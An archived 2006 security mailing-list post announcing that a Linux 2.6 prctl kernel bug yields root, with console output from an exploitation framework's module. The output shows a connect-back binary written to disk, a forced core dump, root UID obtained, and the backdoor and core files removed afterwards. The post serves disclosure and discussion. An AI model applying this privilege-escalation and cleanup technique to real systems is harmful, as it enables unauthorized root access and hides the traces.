Dailydave mailing list archives
DSU
From: Dave Aitel <dave () immunityinc com>
Date: Tue, 11 Jul 2006 09:57:42 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 So the 2.6 prctl kernel bug is exploitable to get root. Typically on these sorts of things, you just read what Paul Starzets has to say on the matter and accept it. But for people who are having problems believing it, we posted an exploit to the partner's page about it. This is the difference between Linux and Windows. If this had been Microsoft they would have just changed the behavior silently or made it part of some other patch and hoped no one noticed. Example commandline usage on Linux MOSDEF node: Linux/MOSDEF$ runmodule DSU -v0 -t127.0.0.1 [C] Running module: DSU [C] Args: -v0 -t127.0.0.1 Loading DSU ... [ ok ] [C] ID: 0 Setinfo: > DSU (in progress) < [C] prctl ok. [C] RLIMIT_CORE before: [0L, 4294967295L] [C] setrlimit result: 0 [C] RLIMIT_CORE after: [8192L, 8192L] [C] prctl ok. [C] chdir ok. [C] connectback ELF size: 2998 [C] file wrote successfully [C] strcpy ok. [C] fork result: 4830 [C] kill worked. [C] Segmentation fault (core dumped) [C] waiting [C] ROOOOOOOOOOOOOOOOOOT [C] Self.fd=4 [C] Set up Linux dynamic linking assembly component server Initialized sendint with fd=4 [C] Initialized Local Functions. [C] Resetting signal handlers... [C] Reset sigchild [C] Getting UIDs [C] backdoor file removed. [C] coredump file removed. [C] Done. [C] ID: 0 Setinfo: > DSU Done < [C] UID=0 EUID=0 GID=0 EGID=0 Linux/MOSDEF# -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFEs65UtehAhL0gheoRAqKiAJ474oO9zHkiil6o+FTS3TyCXnvBoQCffnsO pbPHnGmcYZCtlzOsks33bFQ= =K+xP -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- DSU Dave Aitel (Jul 11)
- Re: DSU TINNES Julien RD-MAPS-ISS (Jul 12)